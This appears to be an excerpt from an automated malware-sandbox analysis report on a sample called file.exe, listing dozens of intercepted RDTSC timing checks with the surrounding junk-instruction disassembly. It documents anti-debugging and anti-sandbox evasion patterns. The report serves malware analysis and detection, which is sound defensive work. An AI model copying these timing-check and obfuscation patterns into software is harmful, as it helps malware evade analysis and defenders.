                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EBEA second address: 127EC0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EC0B second address: 127EC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868E9 second address: 12868EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868EF second address: 12868F9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12868F9 second address: 1286920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F04D4C82A4Eh 0x0000000c jnc 00007F04D4C82A4Eh 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12862EF second address: 128630A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C79EB6h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128630A second address: 1286314 instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C82A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1286489 second address: 128648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128648F second address: 12864B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F04D4C82A4Ah 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F04D4C82A4Eh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B0 second address: 12864B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12864B8 second address: 12864BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5B2 second address: 128C5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5B8 second address: 128C5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5D0 second address: 128C5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5ED second address: 128C627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F04D4C82A55h 0x00000012 jmp 00007F04D4C82A52h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12972C6 second address: 12972CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C50 second address: 1296C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C54 second address: 1296C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F04D4C79EB4h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C78 second address: 1296C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CC9 second address: 12A1CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F04D4C79EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CD8 second address: 12A1CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A58h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CF6 second address: 12A1D17 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C79EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1D17 second address: 12A1D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1D1D second address: 12A1D27 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9715 second address: 12A9752 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F04D4C82A59h 0x00000008 pop ebx 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A51h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 js 00007F04D4C82A4Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9752 second address: 12A976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F04D4C79EB5h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A95B5 second address: 12A95BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F04D4C82A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACDF0 second address: 12ACE52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EAAh 0x00000007 push eax 0x00000008 jmp 00007F04D4C79EAEh 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F04D4C79EECh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F04D4C79EB1h 0x0000001e jmp 00007F04D4C79EAFh 0x00000023 jmp 00007F04D4C79EB0h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jo 00007F04D4C79EA6h 0x00000031 push edx 0x00000032 pop edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACBFB second address: 12ACC03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACC03 second address: 12ACC22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EADh 0x00000007 jnl 00007F04D4C79EA8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACC22 second address: 12ACC2F instructions: 0x00000000 rdtsc 0x00000002 je 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACC2F second address: 12ACC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACC37 second address: 12ACC3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B243F second address: 12B244A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F04D4C79EA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B244A second address: 12B2452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2712 second address: 12B2723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jo 00007F04D4C79ECEh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2723 second address: 12B2727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2727 second address: 12B2737 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F04D4C79EA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B2737 second address: 12B273B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B273B second address: 12B2741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B33CE second address: 12B33D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B33D4 second address: 12B33F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F04D4C79EA6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F04D4C79EB5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B33F6 second address: 12B33FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B33FE second address: 12B3404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8143 second address: 12B8147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB33F second address: 11BB356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB356 second address: 11BB366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F04D4C82A48h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B9737 second address: 12B973B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C0589 second address: 12C059D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F04D4C82A46h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C059D second address: 12C05C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F04D4C79EADh 0x00000013 pushad 0x00000014 popad 0x00000015 je 00007F04D4C79EA6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3894 second address: 12C38A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C38A0 second address: 12C38D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007F04D4C79EB6h 0x0000000d jmp 00007F04D4C79EB0h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C38D3 second address: 12C38DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6F0A second address: 11C6F2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jp 00007F04D4C79EA6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6F2C second address: 11C6F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3DE8 second address: 12D3DFB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F04D4C79EA6h 0x00000008 jp 00007F04D4C79EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3DFB second address: 12D3E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3E01 second address: 12D3E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCE3C second address: 11BCE42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCE42 second address: 11BCE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F04D4C79EA6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCE52 second address: 11BCE5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCE5A second address: 11BCE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BCE62 second address: 11BCE83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F04D4C82A59h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6BB2 second address: 12E6BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6BB8 second address: 12E6BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6BBF second address: 12E6BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5C0C second address: 12E5C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 ja 00007F04D4C82A46h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F04D4C82A56h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5DA0 second address: 12E5DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F04D4C79EB8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5DC0 second address: 12E5DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E5F1A second address: 12E5F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6071 second address: 12E6079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6079 second address: 12E6096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F04D4C79EAEh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6096 second address: 12E60E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F04D4C82A53h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F04D4C82A55h 0x00000015 jmp 00007F04D4C82A53h 0x0000001a popad 0x0000001b push esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E637E second address: 12E6383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E64E6 second address: 12E64F3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6923 second address: 12E6927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E825D second address: 12E8274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F04D4C82A51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8274 second address: 12E828B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F04D4C79EA6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jng 00007F04D4C79EA6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAD73 second address: 12EAD79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB0F9 second address: 12EB117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB117 second address: 12EB132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A56h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB132 second address: 12EB138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB138 second address: 12EB13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB13C second address: 12EB160 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04D4C79EB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB160 second address: 12EB165 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB165 second address: 12EB181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007F04D4C79EAAh 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB181 second address: 12EB186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC15 second address: 12EFC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F04D4C79EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC1F second address: 12EFC25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC25 second address: 12EFC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC2F second address: 12EFC3D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F04D4C82A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC3D second address: 12EFC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F04D4C79EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EFC47 second address: 12EFC51 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C82A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5830287 second address: 58302B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04D4C79EB8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58302B9 second address: 58302C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
